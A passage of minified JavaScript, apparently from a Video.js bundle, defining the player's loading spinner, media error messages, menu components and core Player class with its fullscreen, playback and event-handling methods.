TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-loading-spinner"})},b}(h["default"]);h["default"].registerComponent("LoadingSpinner",i),c["default"]=i,b.exports=c["default"]},{"./component":52}],88:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("object.assign"),f=d(e),g=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){"number"==typeof a?this.code=a:"string"==typeof a?this.message=a:"object"==typeof a&&f["default"](this,a),this.message||(this.message=g.defaultMessages[this.code]||"")});g.prototype.code=0,g.prototype.message="",g.prototype.status=null,g.errorTypes=["MEDIA_ERR_CUSTOM","MEDIA_ERR_ABORTED","MEDIA_ERR_NETWORK","MEDIA_ERR_DECODE","MEDIA_ERR_SRC_NOT_SUPPORTED","MEDIA_ERR_ENCRYPTED"],g.defaultMessages={1:"You aborted the video playback",2:"A network error caused the video download to fail part-way.",3:"The video playback was aborted due to a corruption problem or because the video used features your browser did not support.",4:"The video could not be loaded, either because the server or network failed or because the format is not supported.",5:"The video is encrypted and we do not have the keys to decrypt it."};for(var h=0;h<g.errorTypes.length;h++)g[g.errorTypes[h]]=h,g.prototype[g.errorTypes[h]]=h;c["default"]=g,b.exports=c["default"]},{"object.assign":44}],89:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=a("./menu.js"),l=d(k),m=a("../utils/dom.js"),n=d(m),o=a("../utils/fn.js"),p=d(o),q=a("../utils/to-title-case.js"),r=d(q),s=function(a){function b(c){var d=void 0===arguments[1]?{}:arguments[1];e(this,b),a.call(this,c,d),this.update(),this.on("keydown",this.handleKeyPress),this.el_.setAttribute("aria-haspopup",!0),this.el_.setAttribute("role","button")}return f(b,a),b.prototype.update=function(){var a=this.createMenu();this.menu&&this.removeChild(this.menu),this.menu=a,this.addChild(a),this.buttonPressed_=!1,this.items&&0===this.items.length?this.hide():this.items&&this.items.length>1&&this.show()},b.prototype.createMenu=function(){var a=new l["default"](this.player_);if(this.options_.title&&a.contentEl().appendChild(n.createEl("li",{className:"vjs-menu-title",innerHTML:r["default"](this.options_.title),tabIndex:-1})),this.items=this.createItems(),this.items)for(var b=0;b<this.items.length;b++)a.addItem(this.items[b]);return a},b.prototype.createItems=function(){},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:this.buildCSSClass()})},b.prototype.buildCSSClass=function(){var b="vjs-menu-button";return b+=this.options_.inline===!0?"-inline":"-popup","vjs-menu-button "+b+" "+a.prototype.buildCSSClass.call(this)},b.prototype.handleFocus=function(){},b.prototype.handleBlur=function(){},b.prototype.handleClick=function(){this.one("mouseout",p.bind(this,function(){this.menu.unlockShowing(),this.el_.blur()})),this.buttonPressed_?this.unpressButton():this.pressButton()},b.prototype.handleKeyPress=function(a){32===a.which||13===a.which?(this.buttonPressed_?this.unpressButton():this.pressButton(),a.preventDefault()):27===a.which&&(this.buttonPressed_&&this.unpressButton(),a.preventDefault())},b.prototype.pressButton=function(){this.buttonPressed_=!0,this.menu.lockShowing(),this.el_.setAttribute("aria-pressed",!0),this.items&&this.items.length>0&&this.items[0].el().focus()},b.prototype.unpressButton=function(){this.buttonPressed_=!1,this.menu.unlockShowing(),this.el_.setAttribute("aria-pressed",!1)},b}(h["default"]);j["default"].registerComponent("MenuButton",s),c["default"]=s,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"../utils/dom.js":111,"../utils/fn.js":113,"../utils/to-title-case.js":120,"./menu.js":91}],90:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=a("object.assign"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.selected(d.selected)}return f(b,a),b.prototype.createEl=function(b,c){return a.prototype.createEl.call(this,"li",l["default"]({className:"vjs-menu-item",innerHTML:this.localize(this.options_.label)},c))},b.prototype.handleClick=function(){this.selected(!0)},b.prototype.selected=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){a?(this.addClass("vjs-selected"),this.el_.setAttribute("aria-selected",!0)):(this.removeClass("vjs-selected"),this.el_.setAttribute("aria-selected",!1))}),b}(h["default"]);j["default"].registerComponent("MenuItem",m),c["default"]=m,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"object.assign":44}],91:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component.js"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=a("../utils/fn.js"),l=d(k),m=a("../utils/events.js"),n=d(m),o=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.addItem=function(a){this.addChild(a),a.on("click",l.bind(this,function(){this.unlockShowing()}))},b.prototype.createEl=function(){var b=this.options_.contentElType||"ul";this.contentEl_=j.createEl(b,{className:"vjs-menu-content"});var c=a.prototype.createEl.call(this,"div",{append:this.contentEl_,className:"vjs-menu"});return c.appendChild(this.contentEl_),n.on(c,"click",function(a){a.preventDefault(),a.stopImmediatePropagation()}),c},b}(h["default"]);h["default"].registerComponent("Menu",o),c["default"]=o,b.exports=c["default"]},{"../component.js":52,"../utils/dom.js":111,"../utils/events.js":112,"../utils/fn.js":113}],92:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component.js"),h=d(g),i=a("global/document"),j=d(i),k=a("global/window"),l=(d(k),a("./utils/events.js")),m=d(l),n=a("./utils/dom.js"),o=d(n),p=a("./utils/fn.js"),q=d(p),r=a("./utils/guid.js"),s=d(r),t=a("./utils/browser.js"),u=(d(t),a("./utils/log.js")),v=d(u),w=a("./utils/to-title-case.js"),x=d(w),y=a("./utils/time-ranges.js"),z=a("./utils/buffer.js"),A=a("./fullscreen-api.js"),B=d(A),C=a("./media-error.js"),D=d(C),E=a("./global-options.js"),F=d(E),G=a("safe-json-parse/tuple"),H=d(G),I=a("object.assign"),J=d(I),K=a("./utils/merge-options.js"),L=d(K),M=a("./tech/loader.js"),N=(d(M),a("./poster-image.js")),O=(d(N),a("./tracks/text-track-display.js")),P=(d(O),a("./loading-spinner.js")),Q=(d(P),a("./big-play-button.js")),R=(d(Q),a("./control-bar/control-bar.js")),S=(d(R),a("./error-display.js")),T=(d(S),a("./tracks/text-track-settings.js")),U=(d(T),a("./tech/html5.js")),V=(d(U),function(a){function b(c,d,f){var g=this;if(e(this,b),c.id=c.id||"vjs_video_"+s.newGUID(),d=J["default"](b.getTagSettings(c),d),d.initChildren=!1,d.createEl=!1,d.reportTouchActivity=!1,a.call(this,null,d,f),!this.options_||!this.options_.techOrder||!this.options_.techOrder.length)throw new Error("No techOrder specified. Did you overwrite videojs.options instead of just changing the properties you want to override?");this.tag=c,this.tagAttributes=c&&o.getElAttributes(c),this.language(d.language||F["default"].language),d.languages?!function(){var a={};Object.getOwnPropertyNames(d.languages).forEach(function(b){a[b.toLowerCase()]=d.languages[b]}),g.languages_=a}():this.languages_=F["default"].languages,this.cache_={},this.poster_=d.poster||"",this.controls_=!!d.controls,c.controls=!1,this.scrubbing_=!1,this.el_=this.createEl();var h=L["default"]({},this.options_);d.plugins&&!function(){var a=d.plugins;Object.getOwnPropertyNames(a).forEach(function(b){a[b].playerOptions=h,"function"==typeof this[b]?this[b](a[b]):v["default"].error("Unable to find plugin:",b)},g)}(),this.options_.playerOptions=h,this.initChildren(),this.isAudio("audio"===c.nodeName.toLowerCase()),this.addClass(this.controls()?"vjs-controls-enabled":"vjs-controls-disabled"),this.isAudio()&&this.addClass("vjs-audio"),this.flexNotSupported_()&&this.addClass("vjs-no-flex"),b.players[this.id_]=this,this.userActive_=!0,this.reportUserActivity(),this.listenForUserActivity(),this.on("fullscreenchange",this.handleFullscreenChange),this.on("stageclick",this.handleStageClick)}return f(b,a),b.prototype.dispose=function(){this.trigger("dispose"),this.off("dispose"),b.players[this.id_]=null,this.tag&&this.tag.player&&(this.tag.player=null),this.el_&&this.el_.player&&(this.el_.player=null),this.tech&&this.tech.dispose(),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var b=this.el_=a.prototype.createEl.call(this,"div"),c=this.tag;c.removeAttribute("width"),c.removeAttribute("height");var d=o.getElAttributes(c);return Object.getOwnPropertyNames(d).forEach(function(a){"class"===a?b.className=d[a]:b.setAttribute(a,d[a])}),c.id+="_html5_api",c.className="vjs-tech",c.player=b.player=this,this.addClass("vjs-paused"),this.styleEl_=j["default"].createElement("style"),b.appendChild(this.styleEl_),this.width(this.options_.width),this.height(this.options_.height),this.fluid(this.options_.fluid),this.aspectRatio(this.options_.aspectRatio),c.initNetworkState_=c.networkState,c.parentNode&&c.parentNode.insertBefore(b,c),o.insertElFirst(c,b),this.el_=b,b},b.prototype.width=function(a){return this.dimension("width",a)},b.prototype.height=function(a){return this.dimension("height",a)},b.prototype.dimension=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a,b){var c=a+"_";if(void 0===b)return this[c]||0;if(""===b)this[c]=void 0;else{var d=parseFloat(b);if(isNaN(d))return v["default"].error('Improper value "'+b+'" supplied for for '+a),this;this[c]=d}return this.updateStyleEl_(),this}),b.prototype.fluid=function(a){return void 0===a?!!this.fluid_:(this.fluid_=!!a,void(a?this.addClass("vjs-fluid"):this.removeClass("vjs-fluid")))},b.prototype.aspectRatio=function(a){if(void 0===a)return this.aspectRatio_;if(!/^\d+\:\d+$/.test(a))throw new Error("Improper value supplied for aspect ratio. 
The format should be width:height, for example 16:9.");this.aspectRatio_=a,this.fluid(!0),this.updateStyleEl_()},b.prototype.updateStyleEl_=function(){var a=void 0,b=void 0,c=void 0;c=void 0!==this.aspectRatio_&&"auto"!==this.aspectRatio_?this.aspectRatio_:this.videoWidth()?this.videoWidth()+":"+this.videoHeight():"16:9";var d=c.split(":"),e=d[1]/d[0];a=void 0!==this.width_?this.width_:void 0!==this.height_?this.height_/e:this.videoWidth()||300,b=void 0!==this.height_?this.height_:a*e;var f=this.id()+"-dimensions";this.addClass(f);var g="."+f+" { width: "+a+"px; height: "+b+"px; }";g+="."+f+".vjs-fluid { padding-top: "+100*e+"%; }",this.styleEl_.styleSheet?this.styleEl_.styleSheet.cssText=g:this.styleEl_.innerHTML=g},b.prototype.loadTech=function(a,b){this.tech&&this.unloadTech(),"Html5"!==a&&this.tag&&(h["default"].getComponent("Html5").disposeMediaElement(this.tag),this.tag.player=null,this.tag=null),this.techName=a,this.isReady_=!1;var c=q.bind(this,function(){this.triggerReady()}),d=J["default"]({source:b,playerId:this.id(),techId:""+this.id()+"_"+a+"_api",textTracks:this.textTracks_,autoplay:this.options_.autoplay,preload:this.options_.preload,loop:this.options_.loop,muted:this.options_.muted,poster:this.poster(),language:this.language()},this.options_[a.toLowerCase()]);this.tag&&(d.tag=this.tag),b&&(this.currentType_=b.type,b.src===this.cache_.src&&this.cache_.currentTime>0&&(d.startTime=this.cache_.currentTime),this.cache_.src=b.src);var e=h["default"].getComponent(a);this.tech=new e(d),this.on(this.tech,"ready",this.handleTechReady),this.on(this.tech,"usenativecontrols",this.handleTechUseNativeControls),this.on(this.tech,"loadstart",this.handleTechLoadStart),this.on(this.tech,"waiting",this.handleTechWaiting),this.on(this.tech,"canplay",this.handleTechCanPlay),this.on(this.tech,"canplaythrough",this.handleTechCanPlayThrough),this.on(this.tech,"playing",this.handleTechPlaying),this.on(this.tech,"ended",this.handleTechEnded),this.on(this.tech,"seeking",this.handleTechSeeking),this.on(this.tech,"seeked",this.handleTechSeeked),this.on(this.tech,"play",this.handleTechPlay),this.on(this.tech,"firstplay",this.handleTechFirstPlay),this.on(this.tech,"pause",this.handleTechPause),this.on(this.tech,"progress",this.handleTechProgress),this.on(this.tech,"durationchange",this.handleTechDurationChange),this.on(this.tech,"fullscreenchange",this.handleTechFullscreenChange),this.on(this.tech,"error",this.handleTechError),this.on(this.tech,"suspend",this.handleTechSuspend),this.on(this.tech,"abort",this.handleTechAbort),this.on(this.tech,"emptied",this.handleTechEmptied),this.on(this.tech,"stalled",this.handleTechStalled),this.on(this.tech,"loadedmetadata",this.handleTechLoadedMetaData),this.on(this.tech,"loadeddata",this.handleTechLoadedData),this.on(this.tech,"timeupdate",this.handleTechTimeUpdate),this.on(this.tech,"ratechange",this.handleTechRateChange),this.on(this.tech,"volumechange",this.handleTechVolumeChange),this.on(this.tech,"texttrackchange",this.onTextTrackChange),this.on(this.tech,"loadedmetadata",this.updateStyleEl_),this.controls()&&!this.usingNativeControls()&&this.addTechControlsListeners(),this.tech.el().parentNode===this.el()||"Html5"===a&&this.tag||o.insertElFirst(this.tech.el(),this.el()),this.tag&&(this.tag.player=null,this.tag=null),this.tech.ready(c)},b.prototype.unloadTech=function(){this.textTracks_=this.textTracks(),this.isReady_=!1,this.tech.dispose(),this.tech=!1},b.prototype.addTechControlsListeners=function(){this.on(this.tech,"mousedown",this.handleTechClick),this.on(t
his.tech,"touchstart",this.handleTechTouchStart),this.on(this.tech,"touchmove",this.handleTechTouchMove),this.on(this.tech,"touchend",this.handleTechTouchEnd),this.on(this.tech,"tap",this.handleTechTap)},b.prototype.removeTechControlsListeners=function(){this.off(this.tech,"tap",this.handleTechTap),this.off(this.tech,"touchstart",this.handleTechTouchStart),this.off(this.tech,"touchmove",this.handleTechTouchMove),this.off(this.tech,"touchend",this.handleTechTouchEnd),this.off(this.tech,"mousedown",this.handleTechClick)},b.prototype.handleTechReady=function(){this.triggerReady(),this.cache_.volume&&this.techCall("setVolume",this.cache_.volume),this.tag&&this.options_.autoplay&&this.paused()&&(delete this.tag.poster,this.play())},b.prototype.handleTechUseNativeControls=function(){this.usingNativeControls(!0)},b.prototype.handleTechLoadStart=function(){this.removeClass("vjs-ended"),this.error(null),this.paused()?(this.hasStarted(!1),this.trigger("loadstart")):(this.trigger("loadstart"),this.trigger("firstplay"))},b.prototype.hasStarted=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0!==a?(this.hasStarted_!==a&&(this.hasStarted_=a,a?(this.addClass("vjs-has-started"),this.trigger("firstplay")):this.removeClass("vjs-has-started")),this):!!this.hasStarted_}),b.prototype.handleTechPlay=function(){this.removeClass("vjs-ended"),this.removeClass("vjs-paused"),this.addClass("vjs-playing"),this.hasStarted(!0),this.trigger("play")},b.prototype.handleTechWaiting=function(){this.addClass("vjs-waiting"),this.trigger("waiting")},b.prototype.handleTechCanPlay=function(){this.removeClass("vjs-waiting"),this.trigger("canplay")},b.prototype.handleTechCanPlayThrough=function(){this.removeClass("vjs-waiting"),this.trigger("canplaythrough")},b.prototype.handleTechPlaying=function(){this.removeClass("vjs-waiting"),this.trigger("playing")},b.prototype.handleTechSeeking=function(){this.addClass("vjs-seeking"),this.trigger("seeking")},b.prototype.handleTechSeeked=function(){this.removeClass("vjs-seeking"),this.trigger("seeked")},b.prototype.handleTechFirstPlay=function(){this.options_.starttime&&this.currentTime(this.options_.starttime),this.addClass("vjs-has-started"),this.trigger("firstplay")},b.prototype.handleTechPause=function(){this.removeClass("vjs-playing"),this.addClass("vjs-paused"),this.trigger("pause")},b.prototype.handleTechProgress=function(){this.trigger("progress"),1===this.bufferedPercent()&&this.trigger("loadedalldata")},b.prototype.handleTechEnded=function(){this.addClass("vjs-ended"),this.options_.loop?(this.currentTime(0),this.play()):this.paused()||this.pause(),this.trigger("ended")},b.prototype.handleTechDurationChange=function(){this.updateDuration(),this.trigger("durationchange")},b.prototype.handleTechClick=function(a){0===a.button&&this.controls()&&(this.paused()?this.play():this.pause())},b.prototype.handleTechTap=function(){this.userActive(!this.userActive())},b.prototype.handleTechTouchStart=function(){this.userWasActive=this.userActive()},b.prototype.handleTechTouchMove=function(){this.userWasActive&&this.reportUserActivity()},b.prototype.handleTechTouchEnd=function(a){a.preventDefault()},b.prototype.updateDuration=function(){var a=this.techGet("duration");a&&(0>a&&(a=1/0),this.duration(a),a===1/0?this.addClass("vjs-live"):this.removeClass("vjs-live"));
},b.prototype.handleFullscreenChange=function(){this.isFullscreen()?this.addClass("vjs-fullscreen"):this.removeClass("vjs-fullscreen")},b.prototype.handleStageClick=function(){this.reportUserActivity()},b.prototype.handleTechFullscreenChange=function(a,b){b&&this.isFullscreen(b.isFullscreen),this.trigger("fullscreenchange")},b.prototype.handleTechError=function(){this.error(this.tech.error().code)},b.prototype.handleTechSuspend=function(){this.trigger("suspend")},b.prototype.handleTechAbort=function(){this.trigger("abort")},b.prototype.handleTechEmptied=function(){this.trigger("emptied")},b.prototype.handleTechStalled=function(){this.trigger("stalled")},b.prototype.handleTechLoadedMetaData=function(){this.trigger("loadedmetadata")},b.prototype.handleTechLoadedData=function(){this.trigger("loadeddata")},b.prototype.handleTechTimeUpdate=function(){this.trigger("timeupdate")},b.prototype.handleTechRateChange=function(){this.trigger("ratechange")},b.prototype.handleTechVolumeChange=function(){this.trigger("volumechange")},b.prototype.onTextTrackChange=function(){this.trigger("texttrackchange")},b.prototype.getCache=function(){return this.cache_},b.prototype.techCall=function(a,b){if(this.tech&&!this.tech.isReady_)this.tech.ready(function(){this[a](b)});else try{this.tech[a](b)}catch(c){throw v["default"](c),c}},b.prototype.techGet=function(a){if(this.tech&&this.tech.isReady_)try{return this.tech[a]()}catch(b){throw void 0===this.tech[a]?v["default"]("Video.js: "+a+" method not defined for "+this.techName+" playback technology.",b):"TypeError"===b.name?(v["default"]("Video.js: "+a+" unavailable on "+this.techName+" playback technology element.",b),this.tech.isReady_=!1):v["default"](b),b}},b.prototype.play=function(){return this.techCall("play"),this},b.prototype.pause=function(){return this.techCall("pause"),this},b.prototype.paused=function(){return this.techGet("paused")===!1?!1:!0},b.prototype.scrubbing=function(a){return void 0!==a?(this.scrubbing_=!!a,a?this.addClass("vjs-scrubbing"):this.removeClass("vjs-scrubbing"),this):this.scrubbing_},b.prototype.currentTime=function(a){return void 0!==a?(this.techCall("setCurrentTime",a),this):this.cache_.currentTime=this.techGet("currentTime")||0},b.prototype.duration=function(a){return void 0!==a?(this.cache_.duration=parseFloat(a),this):(void 0===this.cache_.duration&&this.updateDuration(),this.cache_.duration||0)},b.prototype.remainingTime=function(){return this.duration()-this.currentTime()},b.prototype.buffered=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){var a=this.techGet("buffered");return a&&a.length||(a=y.createTimeRange(0,0)),a}),b.prototype.bufferedPercent=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return z.bufferedPercent(this.buffered(),this.duration())}),b.prototype.bufferedEnd=function(){var a=this.buffered(),b=this.duration(),c=a.end(a.length-1);return c>b&&(c=b),c},b.prototype.volume=function(a){var b=void 0;return void 0!==a?(b=Math.max(0,Math.min(1,parseFloat(a))),this.cache_.volume=b,this.techCall("setVolume",b),this):(b=parseFloat(this.techGet("volume")),isNaN(b)?1:b)},b.prototype.muted=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0!==a?(this.techCall("setMuted",a),this):this.techGet("muted")||!1}),b.prototype.supportsFullScreen=function(){return 
this.techGet("supportsFullScreen")||!1},b.prototype.isFullscreen=function(a){return void 0!==a?(this.isFullscreen_=!!a,this):!!this.isFullscreen_},b.prototype.isFullScreen=function(a){return v["default"].warn('player.isFullScreen() has been deprecated, use player.isFullscreen() with a lowercase "s")'),this.isFullscreen(a)},b.prototype.requestFullscreen=function(){var a=B["default"];return this.isFullscreen(!0),a.requestFullscreen?(m.on(j["default"],a.fullscreenchange,q.bind(this,function b(){this.isFullscreen(j["default"][a.fullscreenElement]),this.isFullscreen()===!1&&m.off(j["default"],a.fullscreenchange,b),this.trigger("fullscreenchange")})),this.el_[a.requestFullscreen]()):this.tech.supportsFullScreen()?this.techCall("enterFullScreen"):(this.enterFullWindow(),this.trigger("fullscreenchange")),this},b.prototype.requestFullScreen=function(){return v["default"].warn('player.requestFullScreen() has been deprecated, use player.requestFullscreen() with a lowercase "s")'),this.requestFullscreen()},b.prototype.exitFullscreen=function(){var a=B["default"];return this.isFullscreen(!1),a.requestFullscreen?j["default"][a.exitFullscreen]():this.tech.supportsFullScreen()?this.techCall("exitFullScreen"):(this.exitFullWindow(),this.trigger("fullscreenchange")),this},b.prototype.cancelFullScreen=function(){return v["default"].warn("player.cancelFullScreen() has been deprecated, use player.exitFullscreen()"),this.exitFullscreen()},b.prototype.enterFullWindow=function(){this.isFullWindow=!0,this.docOrigOverflow=j["default"].documentElement.style.overflow,m.on(j["default"],"keydown",q.bind(this,this.fullWindowOnEscKey)),j["default"].documentElement.style.overflow="hidden",o.addElClass(j["default"].body,"vjs-full-window"),this.trigger("enterFullWindow")},b.prototype.fullWindowOnEscKey=function(a){27===a.keyCode&&(this.isFullscreen()===!0?this.exitFullscreen():this.exitFullWindow())},b.prototype.exitFullWindow=function(){this.isFullWindow=!1,m.off(j["default"],"keydown",this.fullWindowOnEscKey),j["default"].documentElement.style.overflow=this.docOrigOverflow,o.removeElClass(j["default"].body,"vjs-full-window"),this.trigger("exitFullWindow")},b.prototype.selectSource=function(a){for(var b=0,c=this.options_.techOrder;b<c.length;b++){var d=x["default"](c[b]),e=h["default"].getComponent(d);if(e){if(e.isSupported())for(var f=0,g=a;f<g.length;f++){var i=g[f];if(e.canPlaySource(i))return{source:i,tech:d}}}else v["default"].error('The "'+d+'" tech is undefined. 
Skipped browser support check for that tech.')}return!1},b.prototype.src=function(a){if(void 0===a)return this.techGet("src");var b=h["default"].getComponent(this.techName);return Array.isArray(a)?this.sourceList_(a):"string"==typeof a?this.src({src:a}):a instanceof Object&&(a.type&&!b.canPlaySource(a)?this.sourceList_([a]):(this.cache_.src=a.src,this.currentType_=a.type||"",this.ready(function(){b.prototype.hasOwnProperty("setSource")?this.techCall("setSource",a):this.techCall("src",a.src),"auto"===this.options_.preload&&this.load(),this.options_.autoplay&&this.play()}))),this},b.prototype.sourceList_=function(a){var b=this.selectSource(a);b?b.tech===this.techName?this.src(b.source):this.loadTech(b.tech,b.source):(this.setTimeout(function(){this.error({code:4,message:this.localize(this.options_.notSupportedMessage)})},0),this.triggerReady())},b.prototype.load=function(){return this.techCall("load"),this},b.prototype.currentSrc=function(){return this.techGet("currentSrc")||this.cache_.src||""},b.prototype.currentType=function(){return this.currentType_||""},b.prototype.preload=function(a){return void 0!==a?(this.techCall("setPreload",a),this.options_.preload=a,this):this.techGet("preload")},b.prototype.autoplay=function(a){return void 0!==a?(this.techCall("setAutoplay",a),this.options_.autoplay=a,this):this.techGet("autoplay",a)},b.prototype.loop=function(a){return void 0!==a?(this.techCall("setLoop",a),this.options_.loop=a,this):this.techGet("loop")},b.prototype.poster=function(a){return void 0===a?this.poster_:(a||(a=""),this.poster_=a,this.techCall("setPoster",a),this.trigger("posterchange"),this)},b.prototype.controls=function(a){return void 0!==a?(a=!!a,this.controls_!==a&&(this.controls_=a,this.usingNativeControls()&&this.techCall("setControls",a),a?(this.removeClass("vjs-controls-disabled"),this.addClass("vjs-controls-enabled"),this.trigger("controlsenabled"),this.usingNativeControls()||this.addTechControlsListeners()):(this.removeClass("vjs-controls-enabled"),this.addClass("vjs-controls-disabled"),this.trigger("controlsdisabled"),this.usingNativeControls()||this.removeTechControlsListeners())),this):!!this.controls_},b.prototype.usingNativeControls=function(a){return void 0!==a?(a=!!a,this.usingNativeControls_!==a&&(this.usingNativeControls_=a,a?(this.addClass("vjs-using-native-controls"),this.trigger("usingnativecontrols")):(this.removeClass("vjs-using-native-controls"),this.trigger("usingcustomcontrols"))),this):!!this.usingNativeControls_},b.prototype.error=function(a){return void 0===a?this.error_||null:null===a?(this.error_=a,this.removeClass("vjs-error"),this):(this.error_=a instanceof D["default"]?a:new D["default"](a),this.trigger("error"),this.addClass("vjs-error"),v["default"].error("(CODE:"+this.error_.code+" "+D["default"].errorTypes[this.error_.code]+")",this.error_.message,this.error_),this)},b.prototype.ended=function(){return this.techGet("ended")},b.prototype.seeking=function(){return this.techGet("seeking")},b.prototype.seekable=function(){return this.techGet("seekable")},b.prototype.reportUserActivity=function(){this.userActivity_=!0},b.prototype.userActive=function(a){return void 
0!==a?(a=!!a,a!==this.userActive_&&(this.userActive_=a,a?(this.userActivity_=!0,this.removeClass("vjs-user-inactive"),this.addClass("vjs-user-active"),this.trigger("useractive")):(this.userActivity_=!1,this.tech&&this.tech.one("mousemove",function(a){a.stopPropagation(),a.preventDefault()}),this.removeClass("vjs-user-active"),this.addClass("vjs-user-inactive"),this.trigger("userinactive"))),this):this.userActive_},b.prototype.listenForUserActivity=function(){var a=void 0,b=void 0,c=void 0,d=q.bind(this,this.reportUserActivity),e=function(a){(a.screenX!==b||a.screenY!==c)&&(b=a.screenX,c=a.screenY,d())},f=function(){d(),this.clearInterval(a),a=this.setInterval(d,250)},g=function(){d(),this.clearInterval(a)};this.on("mousedown",f),this.on("mousemove",e),this.on("mouseup",g),this.on("keydown",d),this.on("keyup",d);{var h=void 0;this.setInterval(function(){if(this.userActivity_){this.userActivity_=!1,this.userActive(!0),this.clearTimeout(h);var a=this.options_.inactivityTimeout;a>0&&(h=this.setTimeout(function(){this.userActivity_||this.userActive(!1)},a))}},250)}},b.prototype.playbackRate=function(a){return void 0!==a?(this.techCall("setPlaybackRate",a),this):this.tech&&this.tech.featuresPlaybackRate?this.techGet("playbackRate"):1},b.prototype.isAudio=function(a){return void 0!==a?(this.isAudio_=!!a,this):!!this.isAudio_},b.prototype.networkState=function(){return this.techGet("networkState")},b.prototype.readyState=function(){return this.techGet("readyState")},b.prototype.textTracks=function(){return this.tech&&this.tech.textTracks()},b.prototype.remoteTextTracks=function(){return this.tech&&this.tech.remoteTextTracks()},b.prototype.addTextTrack=function(a,b,c){return this.tech&&this.tech.addTextTrack(a,b,c)},b.prototype.addRemoteTextTrack=function(a){return this.tech&&this.tech.addRemoteTextTrack(a)},b.prototype.removeRemoteTextTrack=function(a){this.tech&&this.tech.removeRemoteTextTrack(a)},b.prototype.videoWidth=function(){return this.tech&&this.tech.videoWidth&&this.tech.videoWidth()||0},b.prototype.videoHeight=function(){return this.tech&&this.tech.videoHeight&&this.tech.videoHeight()||0},b.prototype.language=function(a){return void 0===a?this.language_:(this.language_=(""+a).toLowerCase(),this)},b.prototype.languages=function(){return L["default"](F["default"].languages,this.languages_)},b.prototype.toJSON=function(){var a=L["default"](this.options_),b=a.tracks;a.tracks=[];for(var c=0;c<b.length;c++){var d=b[c];d=L["default"](d),d.player=void 0,a.tracks[c]=d}return a},b.getTagSettings=function(a){var b={sources:[],tracks:[]},c=o.getElAttributes(a),d=c["data-setup"];if(null!==d){var e=H["default"](d||"{}"),f=e[0],g=e[1];f&&v["default"].error(f),J["default"](c,g)}if(J["default"](b,c),a.hasChildNodes())for(var h=a.childNodes,i=0,j=h.length;j>i;i++){var k=h[i],l=k.nodeName.toLowerCase();"source"===l?b.sources.push(o.getElAttributes(k)):"track"===l&&b.tracks.push(o.getElAttributes(k))}return b},b}(h["default"]));V.players={},V.prototype.options_=F["default"],V.prototype.handleLoadedMetaData,V.prototype.handleLoadedData,V.prototype.handleLoadedAllData,V.prototype.handleUserActive,V.prototype.handleUserInactive,V.prototype.handleTimeUpdate,V.prototype.handleVolumeChange,V.prototype.handleError,V.prototype.flexNotSupported_=function(){var a=j["default"].createElement("i");return!("flexBasis"in a.style||"webkitFlexBasis"in a.style||"mozFlexBasis"in a.style||"msFlexBasis"in a.style||"msFlexOrder"in 
